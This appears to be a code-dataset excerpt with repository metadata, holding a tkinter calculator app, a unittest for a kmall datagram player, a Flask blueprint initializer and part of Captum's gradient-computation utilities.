self.set_display()
self.set_buttons()
# Clear
self.clear()
def set_title(self):
self.root.title(self.app_title)
def set_display(self):
self.display = tkinter.Entry(self.root, font=self.disp_font, justify=tkinter.RIGHT)
self.display.grid(row=0, column=0, columnspan=4, sticky="news", ipady=10)
def set_buttons(self):
# row 1
self.btn_clear = tkinter.Button(self.root, text="C", font=self.btn_font, command=lambda: self.btn_press("C"))
self.btn_clear.grid(row=1, column=0, sticky="news")
self.btn_negative = tkinter.Button(self.root, text="+/-", font=self.btn_font, command=lambda: self.btn_press("+/-"))
self.btn_negative.grid(row=1, column=1, sticky="news")
self.btn_percent = tkinter.Button(self.root, text="%", font=self.btn_font, command=lambda: self.btn_press("%"))
self.btn_percent.grid(row=1, column=2, sticky="news")
self.btn_divide = tkinter.Button(self.root, text="÷", font=self.btn_font, command=lambda: self.btn_press("/"))
self.btn_divide.grid(row=1, column=3, sticky="news")
# row 2
self.btn_7 = tkinter.Button(self.root, text="7", font=self.btn_font, command=lambda: self.btn_press("7"))
self.btn_7.grid(row=2, column=0, sticky="news")
self.btn_8 = tkinter.Button(self.root, text="8", font=self.btn_font, command=lambda: self.btn_press("8"))
self.btn_8.grid(row=2, column=1, sticky="news")
self.btn_9 = tkinter.Button(self.root, text="9", font=self.btn_font, command=lambda: self.btn_press("9"))
self.btn_9.grid(row=2, column=2, sticky="news")
self.btn_multiply = tkinter.Button(self.root, text="x", font=self.btn_font, command=lambda: self.btn_press("*"))
self.btn_multiply.grid(row=2, column=3, sticky="news")
# row 3
self.btn_4 = tkinter.Button(self.root, text="4", font=self.btn_font, command=lambda: self.btn_press("4"))
self.btn_4.grid(row=3, column=0, sticky="news")
self.btn_5 = tkinter.Button(self.root, text="5", font=self.btn_font, command=lambda: self.btn_press("5"))
self.btn_5.grid(row=3, column=1, sticky="news")
self.btn_6 = tkinter.Button(self.root, text="6", font=self.btn_font, command=lambda: self.btn_press("6"))
self.btn_6.grid(row=3, column=2, sticky="news")
self.btn_minus = tkinter.Button(self.root, text="-", font=self.btn_font, command=lambda: self.btn_press("-"))
self.btn_minus.grid(row=3, column=3, sticky="news")
# row 4
self.btn_1 = tkinter.Button(self.root, text="1", font=self.btn_font, command=lambda: self.btn_press("1"))
self.btn_1.grid(row=4, column=0, sticky="news")
self.btn_2 = tkinter.Button(self.root, text="2", font=self.btn_font, command=lambda: self.btn_press("2"))
self.btn_2.grid(row=4, column=1, sticky="news")
self.btn_3 = tkinter.Button(self.root, text="3", font=self.btn_font, command=lambda: self.btn_press("3"))
self.btn_3.grid(row=4, column=2, sticky="news")
self.btn_plus = tkinter.Button(self.root, text="+", font=self.btn_font, command=lambda: self.btn_press("+"))
self.btn_plus.grid(row=4, column=3, sticky="news")
# row 5
self.btn_0 = tkinter.Button(self.root, text="0", font=self.btn_font, command=lambda: self.btn_press("0"))
self.btn_0.grid(row=5, column=0, columnspan=2, sticky="news")
self.btn_dot = tkinter.Button(self.root, text=".", font=self.btn_font, command=lambda: self.btn_press("."))
self.btn_dot.grid(row=5, column=2, sticky="news")
self.btn_equal = tkinter.Button(self.root, text="=", font=self.btn_font, command=lambda: self.btn_press("="))
self.btn_equal.grid(row=5, column=3, sticky="news")
def clear(self):
self.ans = "0"
self.operator = None
self.user_input = ""
self.last_user_input = ""
self.ever_equals = False
self.is_result = False
self.update_display("0")
self.true_equal = False
def update_display(self, content):
self.display.delete(0, tkinter.END)
self.display.insert(0, content)
def calculation(self, ans, user_input, operator):
ans = float(ans)
user_input = float(user_input)
if operator is not None:
if operator == "+":
ans = ans + user_input
if operator == "-":
ans = ans - user_input
if operator == "*":
ans = ans * user_input
if operator == "/":
ans = ans / user_input
return str(ans)
else:
return str(user_input)
def btn_press(self, press):
digits = [str(i) for i in range(10)]
operators = ["+","-","*","/"]
if press == "C":
self.clear()
if self.display.get() == "Error":
pass
else:
if press in digits:
if self.true_equal:
self.clear()
self.user_input += press
self.update_display(self.user_input)
self.is_result = False
if press in operators:
if not self.ever_equals and (not self.operator):
if self.user_input=="":
self.user_input = "0"
self.ans = self.user_input
self.user_input = ""
if self.operator and self.user_input !="":
self.btn_press("=")
self.operator = press
self.true_equal = False
if press == ".":
if "." not in self.user_input:
if self.user_input == "":
self.user_input = "0."
else:
self.user_input = self.user_input + "."
self.update_display(self.user_input)
self.is_result = False
if press == "+/-":
if self.is_result:
self.ans = str(-float(self.ans))
self.update_display(self.ans)
else:
if self.user_input == "":
self.user_input = "0"
self.user_input = str(-float(self.user_input))
self.update_display(self.user_input)
if press == "%":
if self.is_result:
self.ans = str(float(self.ans)/100)
self.update_display(self.ans)
else:
if self.user_input == "":
self.user_input = "0"
self.user_input = str(float(self.user_input)/100)
self.update_display(self.user_input)
if press == "=":
if self.user_input == "":
self.user_input = self.last_user_input
if self.user_input == "":
self.user_input = self.ans
try:
self.ans = self.calculation(self.ans, self.user_input, self.operator)
self.last_user_input = self.user_input
self.user_input = ""
self.update_display(self.ans)
self.ever_equals = True
self.is_result = True
self.true_equal = True
except Exception:
self.update_display("Error")
if __name__ == "__main__":
root = tkinter.Tk()
Calculator(root)
root.mainloop()
| 41.91 | 124 | 0.547721 |
import tkinter
class Calculator:
app_title = "A simple calculator"
disp_font = ("Helvetica", 25, "bold")
btn_font = ("Helvetica", 20, "bold")
def __init__(self, root):
self.root = root
self.initialize()
def initialize(self):
self.ans = "0"
self.operator = None
self.user_input = ""
self.last_user_input = ""
self.is_result = False
self.ever_equals = False
self.true_equal = False
self.set_title()
self.set_display()
self.set_buttons()
self.clear()
def set_title(self):
self.root.title(self.app_title)
def set_display(self):
self.display = tkinter.Entry(self.root, font=self.disp_font, justify=tkinter.RIGHT)
self.display.grid(row=0, column=0, columnspan=4, sticky="news", ipady=10)
def set_buttons(self):
self.btn_clear = tkinter.Button(self.root, text="C", font=self.btn_font, command=lambda: self.btn_press("C"))
self.btn_clear.grid(row=1, column=0, sticky="news")
self.btn_negative = tkinter.Button(self.root, text="+/-", font=self.btn_font, command=lambda: self.btn_press("+/-"))
self.btn_negative.grid(row=1, column=1, sticky="news")
self.btn_percent = tkinter.Button(self.root, text="%", font=self.btn_font, command=lambda: self.btn_press("%"))
self.btn_percent.grid(row=1, column=2, sticky="news")
self.btn_divide = tkinter.Button(self.root, text="÷", font=self.btn_font, command=lambda: self.btn_press("/"))
self.btn_divide.grid(row=1, column=3, sticky="news")
self.btn_7 = tkinter.Button(self.root, text="7", font=self.btn_font, command=lambda: self.btn_press("7"))
self.btn_7.grid(row=2, column=0, sticky="news")
self.btn_8 = tkinter.Button(self.root, text="8", font=self.btn_font, command=lambda: self.btn_press("8"))
self.btn_8.grid(row=2, column=1, sticky="news")
self.btn_9 = tkinter.Button(self.root, text="9", font=self.btn_font, command=lambda: self.btn_press("9"))
self.btn_9.grid(row=2, column=2, sticky="news")
self.btn_multiply = tkinter.Button(self.root, text="x", font=self.btn_font, command=lambda: self.btn_press("*"))
self.btn_multiply.grid(row=2, column=3, sticky="news")
self.btn_4 = tkinter.Button(self.root, text="4", font=self.btn_font, command=lambda: self.btn_press("4"))
self.btn_4.grid(row=3, column=0, sticky="news")
self.btn_5 = tkinter.Button(self.root, text="5", font=self.btn_font, command=lambda: self.btn_press("5"))
self.btn_5.grid(row=3, column=1, sticky="news")
self.btn_6 = tkinter.Button(self.root, text="6", font=self.btn_font, command=lambda: self.btn_press("6"))
self.btn_6.grid(row=3, column=2, sticky="news")
self.btn_minus = tkinter.Button(self.root, text="-", font=self.btn_font, command=lambda: self.btn_press("-"))
self.btn_minus.grid(row=3, column=3, sticky="news")
self.btn_1 = tkinter.Button(self.root, text="1", font=self.btn_font, command=lambda: self.btn_press("1"))
self.btn_1.grid(row=4, column=0, sticky="news")
self.btn_2 = tkinter.Button(self.root, text="2", font=self.btn_font, command=lambda: self.btn_press("2"))
self.btn_2.grid(row=4, column=1, sticky="news")
self.btn_3 = tkinter.Button(self.root, text="3", font=self.btn_font, command=lambda: self.btn_press("3"))
self.btn_3.grid(row=4, column=2, sticky="news")
self.btn_plus = tkinter.Button(self.root, text="+", font=self.btn_font, command=lambda: self.btn_press("+"))
self.btn_plus.grid(row=4, column=3, sticky="news")
self.btn_0 = tkinter.Button(self.root, text="0", font=self.btn_font, command=lambda: self.btn_press("0"))
self.btn_0.grid(row=5, column=0, columnspan=2, sticky="news")
self.btn_dot = tkinter.Button(self.root, text=".", font=self.btn_font, command=lambda: self.btn_press("."))
self.btn_dot.grid(row=5, column=2, sticky="news")
self.btn_equal = tkinter.Button(self.root, text="=", font=self.btn_font, command=lambda: self.btn_press("="))
self.btn_equal.grid(row=5, column=3, sticky="news")
def clear(self):
self.ans = "0"
self.operator = None
self.user_input = ""
self.last_user_input = ""
self.ever_equals = False
self.is_result = False
self.update_display("0")
self.true_equal = False
def update_display(self, content):
self.display.delete(0, tkinter.END)
self.display.insert(0, content)
def calculation(self, ans, user_input, operator):
ans = float(ans)
user_input = float(user_input)
if operator is not None:
if operator == "+":
ans = ans + user_input
if operator == "-":
ans = ans - user_input
if operator == "*":
ans = ans * user_input
if operator == "/":
ans = ans / user_input
return str(ans)
else:
return str(user_input)
def btn_press(self, press):
digits = [str(i) for i in range(10)]
operators = ["+","-","*","/"]
if press == "C":
self.clear()
if self.display.get() == "Error":
pass
else:
if press in digits:
if self.true_equal:
self.clear()
self.user_input += press
self.update_display(self.user_input)
self.is_result = False
if press in operators:
if not self.ever_equals and (not self.operator):
if self.user_input=="":
self.user_input = "0"
self.ans = self.user_input
self.user_input = ""
if self.operator and self.user_input !="":
self.btn_press("=")
self.operator = press
self.true_equal = False
if press == ".":
if "." not in self.user_input:
if self.user_input == "":
self.user_input = "0."
else:
self.user_input = self.user_input + "."
self.update_display(self.user_input)
self.is_result = False
if press == "+/-":
if self.is_result:
self.ans = str(-float(self.ans))
self.update_display(self.ans)
else:
if self.user_input == "":
self.user_input = "0"
self.user_input = str(-float(self.user_input))
self.update_display(self.user_input)
if press == "%":
if self.is_result:
self.ans = str(float(self.ans)/100)
self.update_display(self.ans)
else:
if self.user_input == "":
self.user_input = "0"
self.user_input = str(float(self.user_input)/100)
self.update_display(self.user_input)
if press == "=":
if self.user_input == "":
self.user_input = self.last_user_input
if self.user_input == "":
self.user_input = self.ans
try:
self.ans = self.calculation(self.ans, self.user_input, self.operator)
self.last_user_input = self.user_input
self.user_input = ""
self.update_display(self.ans)
self.ever_equals = True
self.is_result = True
self.true_equal = True
except Exception:
self.update_display("Error")
if __name__ == "__main__":
root = tkinter.Tk()
Calculator(root)
root.mainloop()
| true | true |
f70b32e22f1f29ab259a93726874b66aebcfe48d | 1,952 | py | Python | kmall_player.test.py | monsterkittykitty/kmall | 270c9d70de0b0b59dfa56d50db0466e655831e96 | ["CC0-1.0"] | null | null | null | kmall_player.test.py | monsterkittykitty/kmall | 270c9d70de0b0b59dfa56d50db0466e655831e96 | ["CC0-1.0"] | null | null | null | kmall_player.test.py | monsterkittykitty/kmall | 270c9d70de0b0b59dfa56d50db0466e655831e96 | ["CC0-1.0"] | 1 | 2020-12-02T09:00:06.000Z | 2020-12-02T09:00:06.000Z |
import unittest
import pandas as pd
import os
from kmall_player import *
class KmallPlayerTest(unittest.TestCase):
def setUp(self) -> None:
file_name = "data/MRZ_LARGE_SIZE.kmall"
self.f = open(file_name, "rb")
self.file_size = os.fstat(self.f.fileno()).st_size
self.player = KmallPlayer()
k = KMALL.kmall(file_name)
k.index_file()
# Panda DataFrame type
self.index: pd.DataFrame = k.Index
self.mrz_pack = self.index.iloc[0]
def tearDown(self) -> None:
self.f.close()
def test_packet(self):
self.assertEqual(self.index.shape[0], 1)
self.assertTrue(self.mrz_pack['MessageSize'] > self.player.MAX_DATAGRAM_SIZE)
self.assertTrue('#MRZ' in self.mrz_pack['MessageType'])
def test_raw_header_reading(self):
header_dict = self.player.read_header_raw(self.f.read(self.player.HEADER_STRUCT_SIZE))
# Our test file contains only one packet
self.assertEqual(header_dict['numBytesDgm'], self.file_size)
self.assertTrue('#MRZ' in str(header_dict['dgmType']))
def test_partitioning(self):
msgs = self.player.partition_msg(self.f.read(self.mrz_pack['MessageSize']))
# Expecting 2 partitions
self.assertEqual(len(msgs), 2)
# Let's check the newly generated header content for our splits :
# First split should be of maximum size
self.assertEqual(self.player.read_header_raw(msgs[0])['numBytesDgm'], self.player.MAX_DATAGRAM_SIZE)
# Second and last split should take up the rest
last_packet_content_size = (self.file_size - self.player.HEADER_AND_PART_SIZE - 4)\
% self.player.MAX_DATA_SIZE
last_packet_size = last_packet_content_size + self.player.HEADER_AND_PART_SIZE + 4
self.assertEqual(self.player.read_header_raw(msgs[1])['numBytesDgm'], last_packet_size)
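# Worked example with hypothetical constants (not part of the original test):
# assuming MAX_DATAGRAM_SIZE = 64000, HEADER_AND_PART_SIZE = 24 and
# MAX_DATA_SIZE = 64000 - 24 - 4 = 63972, a 100000-byte file leaves
# (100000 - 24 - 4) % 63972 = 36000 content bytes for the second split,
# so the last packet would be 36000 + 24 + 4 = 36028 bytes.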
# Run tests
if __name__ == "__main__":
unittest.main()
| 39.836735 | 108 | 0.67418 |
import unittest
import pandas as pd
import os
from kmall_player import *
class KmallPlayerTest(unittest.TestCase):
def setUp(self) -> None:
file_name = "data/MRZ_LARGE_SIZE.kmall"
self.f = open(file_name, "rb")
self.file_size = os.fstat(self.f.fileno()).st_size
self.player = KmallPlayer()
k = KMALL.kmall(file_name)
k.index_file()
self.index: pd.DataFrame = k.Index
self.mrz_pack = self.index.iloc[0]
def tearDown(self) -> None:
self.f.close()
def test_packet(self):
self.assertEqual(self.index.shape[0], 1)
self.assertTrue(self.mrz_pack['MessageSize'] > self.player.MAX_DATAGRAM_SIZE)
self.assertTrue('#MRZ' in self.mrz_pack['MessageType'])
def test_raw_header_reading(self):
header_dict = self.player.read_header_raw(self.f.read(self.player.HEADER_STRUCT_SIZE))
self.assertEqual(header_dict['numBytesDgm'], self.file_size)
self.assertTrue('#MRZ' in str(header_dict['dgmType']))
def test_partitioning(self):
msgs = self.player.partition_msg(self.f.read(self.mrz_pack['MessageSize']))
self.assertEqual(len(msgs), 2)
# First split should be of maximum size
self.assertEqual(self.player.read_header_raw(msgs[0])['numBytesDgm'], self.player.MAX_DATAGRAM_SIZE)
# Second and last split should take up the rest
last_packet_content_size = (self.file_size - self.player.HEADER_AND_PART_SIZE - 4)\
% self.player.MAX_DATA_SIZE
last_packet_size = last_packet_content_size + self.player.HEADER_AND_PART_SIZE + 4
self.assertEqual(self.player.read_header_raw(msgs[1])['numBytesDgm'], last_packet_size)
# Run tests
if __name__ == "__main__":
unittest.main()
| true | true |
f70b34cdd9079c1a5bc04d0c71dc0e1703742f90 | 161 | py | Python | csv_cti/blueprints/fs_api/__init__.py | Osmond1689/csv-cti | 84be8241e9ba50f495b23775eb153e4129845474 | ["MIT"] | null | null | null | csv_cti/blueprints/fs_api/__init__.py | Osmond1689/csv-cti | 84be8241e9ba50f495b23775eb153e4129845474 | ["MIT"] | null | null | null | csv_cti/blueprints/fs_api/__init__.py | Osmond1689/csv-cti | 84be8241e9ba50f495b23775eb153e4129845474 | ["MIT"] | null | null | null |
from flask import Blueprint
fs_api = Blueprint('fs_api', __name__, template_folder='templates')
from .views import configuration, dialplan, directory, vars, update_cdr
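# A minimal registration sketch (illustrative; `create_app` and the URL prefix
# are assumptions, not part of this package):
#
# from flask import Flask
# from csv_cti.blueprints.fs_api import fs_api
#
# def create_app():
#     app = Flask(__name__)
#     app.register_blueprint(fs_api, url_prefix='/fs_api')
#     return app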
| 32.2 | 67 | 0.84472 |
from flask import Blueprint
fs_api = Blueprint('fs_api', __name__, template_folder='templates')
from .views import configuration, dialplan, directory, vars, update_cdr
| true | true |
f70b35370574700e30c9df6e34e34f4182ba4a8c | 34,208 | py | Python | captum/captum/_utils/gradient.py | tbose20/D-Ref | eda6170a72838b89637df241dd5619e001f3afdb | ["MIT"] | 2 | 2022-03-24T13:41:51.000Z | 2022-03-29T02:32:56.000Z | captum/captum/_utils/gradient.py | tbose20/D-Ref | eda6170a72838b89637df241dd5619e001f3afdb | ["MIT"] | null | null | null | captum/captum/_utils/gradient.py | tbose20/D-Ref | eda6170a72838b89637df241dd5619e001f3afdb | ["MIT"] | null | null | null |
#!/usr/bin/env python3
import threading
import typing
import warnings
from collections import defaultdict
from typing import Any, Callable, Dict, List, Optional, Tuple, Union, cast
import torch
from captum._utils.common import (
_reduce_list,
_run_forward,
_sort_key_list,
_verify_select_neuron,
)
from captum._utils.typing import (
Literal,
ModuleOrModuleList,
TargetType,
TensorOrTupleOfTensorsGeneric,
)
from torch import Tensor, device
from torch.nn import Module
def apply_gradient_requirements(
inputs: Tuple[Tensor, ...], warn: bool = True
) -> List[bool]:
"""
Iterates through a tuple of input tensors and sets requires_grad to be true on
each Tensor, and ensures all grads are set to zero. To ensure that the input
is returned to its initial state, a list of flags representing whether or not
a tensor originally required grad is returned.
"""
assert isinstance(
inputs, tuple
), "Inputs should be wrapped in a tuple prior to preparing for gradients"
grad_required = []
for index, input in enumerate(inputs):
assert isinstance(input, torch.Tensor), "Given input is not a torch.Tensor"
grad_required.append(input.requires_grad)
inputs_dtype = input.dtype
# Note: torch 1.2 doesn't support is_complex for dtype, which is why we
# check for the existence of the is_complex attribute instead.
if not inputs_dtype.is_floating_point and not (
hasattr(inputs_dtype, "is_complex") and inputs_dtype.is_complex
):
if warn:
warnings.warn(
"""Input Tensor %d has a dtype of %s.
Gradients cannot be activated
for these data types."""
% (index, str(inputs_dtype))
)
elif not input.requires_grad:
if warn:
warnings.warn(
"Input Tensor %d did not already require gradients, "
"required_grads has been set automatically." % index
)
input.requires_grad_()
return grad_required
def undo_gradient_requirements(
inputs: Tuple[Tensor, ...], grad_required: List[bool]
) -> None:
"""
Iterates through list of tensors, zeros each gradient, and sets required
grad to false if the corresponding index in grad_required is False.
This method is used to undo the effects of prepare_gradient_inputs, making
grads not required for any input tensor that did not initially require
gradients.
"""
assert isinstance(
inputs, tuple
), "Inputs should be wrapped in a tuple prior to preparing for gradients."
assert len(inputs) == len(
grad_required
), "Input tuple length should match gradient mask."
for index, input in enumerate(inputs):
assert isinstance(input, torch.Tensor), "Given input is not a torch.Tensor"
if not grad_required[index]:
input.requires_grad_(False)
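# Usage sketch (illustrative, not part of the original module): the two helpers
# above are intended to be used as a pair around a gradient computation.
#
# inputs = (torch.rand(2, 3),)                       # hypothetical input tuple
# grad_flags = apply_gradient_requirements(inputs)   # enable requires_grad
# ...compute gradients with respect to `inputs` here...
# undo_gradient_requirements(inputs, grad_flags)     # restore original flags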
def compute_gradients(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
target_ind: TargetType = None,
additional_forward_args: Any = None,
) -> Tuple[Tensor, ...]:
r"""
Computes gradients of the output with respect to inputs for an
arbitrary forward function.
Args:
forward_fn: forward function. This can be for example model's
forward function.
inputs: Input at which gradients are evaluated,
will be passed to forward_fn.
target_ind: Index of the target class for which gradients
must be computed (classification only).
additional_forward_args: Additional input arguments that forward
function requires. It takes an empty tuple (no additional
arguments) if no additional arguments are required
"""
with torch.autograd.set_grad_enabled(True):
# runs forward pass
outputs = _run_forward(forward_fn, inputs, target_ind, additional_forward_args)
assert outputs[0].numel() == 1, (
"Target not provided when necessary, cannot"
" take gradient with respect to multiple outputs."
)
# torch.unbind(forward_out) is a list of scalar tensor tuples and
# contains batch_size * #steps elements
grads = torch.autograd.grad(torch.unbind(outputs), inputs, create_graph=True, retain_graph=True)  # create_graph=True and retain_graph=True added (TB)
return grads
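# Example (hedged sketch; the model, input shape and target index below are
# illustrative, not from the original file):
#
# model = torch.nn.Linear(3, 2)
# x = torch.rand(1, 3, requires_grad=True)
# grads = compute_gradients(model, (x,), target_ind=0)  # gradient of output[0] w.r.t. x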
def _neuron_gradients(
inputs: Union[Tensor, Tuple[Tensor, ...]],
saved_layer: Dict[device, Tuple[Tensor, ...]],
key_list: List[device],
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
) -> Tuple[Tensor, ...]:
with torch.autograd.set_grad_enabled(True):
gradient_tensors = []
for key in key_list:
current_out_tensor = _verify_select_neuron(
saved_layer[key], gradient_neuron_selector
)
gradient_tensors.append(
torch.autograd.grad(
torch.unbind(current_out_tensor)
if current_out_tensor.numel() > 1
else current_out_tensor,
inputs,
)
)
_total_gradients = _reduce_list(gradient_tensors, sum)
return _total_gradients
@typing.overload
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> Tuple[Tensor, ...]:
...
@typing.overload
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: List[Module],
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> List[Tuple[Tensor, ...]]:
...
def _forward_layer_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
additional_forward_args: Any = None,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
grad_enabled: bool = False,
) -> Union[Tuple[Tensor, ...], List[Tuple[Tensor, ...]]]:
return _forward_layer_eval_with_neuron_grads(
forward_fn,
inputs,
layer,
additional_forward_args=additional_forward_args,
gradient_neuron_selector=None,
grad_enabled=grad_enabled,
device_ids=device_ids,
attribute_to_layer_input=attribute_to_layer_input,
)
@typing.overload
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
forward_hook_with_return: Literal[False] = False,
require_layer_grads: bool = False,
) -> Dict[Module, Dict[device, Tuple[Tensor, ...]]]:
...
@typing.overload
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
*,
forward_hook_with_return: Literal[True],
require_layer_grads: bool = False,
) -> Tuple[Dict[Module, Dict[device, Tuple[Tensor, ...]]], Tensor]:
...
def _forward_layer_distributed_eval(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
target_ind: TargetType = None,
additional_forward_args: Any = None,
attribute_to_layer_input: bool = False,
forward_hook_with_return: bool = False,
require_layer_grads: bool = False,
) -> Union[
Tuple[Dict[Module, Dict[device, Tuple[Tensor, ...]]], Tensor],
Dict[Module, Dict[device, Tuple[Tensor, ...]]],
]:
r"""
A helper function that sets a hook on the model's `layer`, runs the forward
pass and returns intermediate layer results, stored in a dictionary,
and optionally also the output of the forward function. The keys in the
dictionary are the device ids and the values are corresponding intermediate layer
results, either the inputs or the outputs of the layer depending on whether we set
`attribute_to_layer_input` to True or False.
This is especially useful when we execute forward pass in a distributed setting,
using `DataParallel`s for example.
"""
saved_layer: Dict[Module, Dict[device, Tuple[Tensor, ...]]] = defaultdict(dict)
lock = threading.Lock()
all_layers: List[Module] = [layer] if isinstance(layer, Module) else layer
# Set a forward hook on specified module and run forward pass to
# get layer output tensor(s).
# For DataParallel models, each partition adds entry to dictionary
# with key as device and value as corresponding Tensor.
def hook_wrapper(original_module):
def forward_hook(module, inp, out=None):
eval_tsrs = inp if attribute_to_layer_input else out
is_eval_tuple = isinstance(eval_tsrs, tuple)
if not is_eval_tuple:
eval_tsrs = (eval_tsrs,)
if require_layer_grads:
apply_gradient_requirements(eval_tsrs, warn=False)
with lock:
nonlocal saved_layer
# Note that cloning behaviour of `eval_tsr` is different
# when `forward_hook_with_return` is set to True. This is because
# otherwise `backward()` on the last output layer won't execute.
if forward_hook_with_return:
saved_layer[original_module][eval_tsrs[0].device] = eval_tsrs
eval_tsrs_to_return = tuple(
eval_tsr.clone() for eval_tsr in eval_tsrs
)
if not is_eval_tuple:
eval_tsrs_to_return = eval_tsrs_to_return[0]
return eval_tsrs_to_return
else:
saved_layer[original_module][eval_tsrs[0].device] = tuple(
eval_tsr.clone() for eval_tsr in eval_tsrs
)
return forward_hook
all_hooks = []
try:
for single_layer in all_layers:
if attribute_to_layer_input:
all_hooks.append(
single_layer.register_forward_pre_hook(hook_wrapper(single_layer))
)
else:
all_hooks.append(
single_layer.register_forward_hook(hook_wrapper(single_layer))
)
output = _run_forward(
forward_fn,
inputs,
target=target_ind,
additional_forward_args=additional_forward_args,
)
finally:
for hook in all_hooks:
hook.remove()
if len(saved_layer) == 0:
raise AssertionError("Forward hook did not obtain any outputs for given layer")
if forward_hook_with_return:
return saved_layer, output
return saved_layer
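# Hedged usage sketch (toy model; names are illustrative): on a plain,
# non-DataParallel model the helper returns a one-entry device dictionary
# per hooked layer.
def _example_forward_layer_distributed_eval():
    model = torch.nn.Sequential(torch.nn.Linear(3, 3), torch.nn.ReLU())
    saved = _forward_layer_distributed_eval(model, torch.randn(2, 3), model[0])
    # saved maps module -> {device: (cloned layer output,)}
    return saved[model[0]]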
def _gather_distributed_tensors(
saved_layer: Dict[device, Tuple[Tensor, ...]],
device_ids: Union[None, List[int]] = None,
key_list: Union[None, List[device]] = None,
) -> Tuple[Tensor, ...]:
r"""
A helper function to concatenate intermediate layer results stored on
different devices in `saved_layer`. `saved_layer` is a dictionary that
contains `device_id` as a key and intermediate layer results (either
the input or the output of the layer) stored on the device corresponding to
the key.
`key_list` is a list of devices in appropriate ordering for concatenation
and if not provided, keys are sorted based on device ids.
If only one key exists (standard model), key list simply has one element.
"""
if key_list is None:
key_list = _sort_key_list(list(saved_layer.keys()), device_ids)
return _reduce_list([saved_layer[device_id] for device_id in key_list])
def _extract_device_ids(
forward_fn: Callable,
saved_layer: Dict[Module, Dict[device, Tuple[Tensor, ...]]],
device_ids: Union[None, List[int]],
) -> Union[None, List[int]]:
r"""
A helper function to extract device_ids from `forward_function` in case it is
    provided as part of a `DataParallel` model or if it is accessible from
`forward_fn`.
In case input device_ids is not None, this function returns that value.
"""
# Multiple devices / keys implies a DataParallel model, so we look for
# device IDs if given or available from forward function
# (DataParallel model object).
if (
max(len(saved_layer[single_layer]) for single_layer in saved_layer) > 1
and device_ids is None
):
if (
hasattr(forward_fn, "device_ids")
and cast(Any, forward_fn).device_ids is not None
):
device_ids = cast(Any, forward_fn).device_ids
else:
raise AssertionError(
"Layer tensors are saved on multiple devices, however unable to access"
" device ID list from the `forward_fn`. Device ID list must be"
" accessible from `forward_fn`. For example, they can be retrieved"
" if `forward_fn` is a model of type `DataParallel`. It is used"
" for identifying device batch ordering."
)
return device_ids
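# Hedged sketch: for a DataParallel-wrapped model, the device ID list this
# helper looks for is exposed as `device_ids` on the wrapper itself. Guarded,
# since it is only meaningful on multi-GPU hosts.
def _example_device_ids(model: Module) -> Union[None, List[int]]:
    if torch.cuda.device_count() > 1:
        return torch.nn.DataParallel(model).device_ids  # e.g. [0, 1]
    return None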
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
*,
gradient_neuron_selector: Union[int, Tuple[Union[int, slice], ...], Callable],
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]]:
...
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: Module,
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Tuple[Tensor, ...]:
...
@typing.overload
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: List[Module],
additional_forward_args: Any = None,
gradient_neuron_selector: None = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> List[Tuple[Tensor, ...]]:
...
def _forward_layer_eval_with_neuron_grads(
forward_fn: Callable,
inputs: Union[Tensor, Tuple[Tensor, ...]],
layer: ModuleOrModuleList,
additional_forward_args: Any = None,
gradient_neuron_selector: Union[
None, int, Tuple[Union[int, slice], ...], Callable
] = None,
grad_enabled: bool = False,
device_ids: Union[None, List[int]] = None,
attribute_to_layer_input: bool = False,
) -> Union[
Tuple[Tuple[Tensor, ...], Tuple[Tensor, ...]],
Tuple[Tensor, ...],
List[Tuple[Tensor, ...]],
]:
"""
This method computes forward evaluation for a particular layer using a
forward hook. If a gradient_neuron_selector is provided, then gradients with
respect to that neuron in the layer output are also returned.
These functionalities are combined due to the behavior of DataParallel models
with hooks, in which hooks are executed once per device. We need to internally
combine the separated tensors from devices by concatenating based on device_ids.
Any necessary gradients must be taken with respect to each independent batched
tensor, so the gradients are computed and combined appropriately.
More information regarding the behavior of forward hooks with DataParallel models
can be found in the PyTorch data parallel documentation. We maintain the separate
evals in a dictionary protected by a lock, analogous to the gather implementation
for the core PyTorch DataParallel implementation.
"""
grad_enabled = True if gradient_neuron_selector is not None else grad_enabled
with torch.autograd.set_grad_enabled(grad_enabled):
saved_layer = _forward_layer_distributed_eval(
forward_fn,
inputs,
layer,
additional_forward_args=additional_forward_args,
attribute_to_layer_input=attribute_to_layer_input,
)
device_ids = _extract_device_ids(forward_fn, saved_layer, device_ids)
# Identifies correct device ordering based on device ids.
# key_list is a list of devices in appropriate ordering for concatenation.
# If only one key exists (standard model), key list simply has one element.
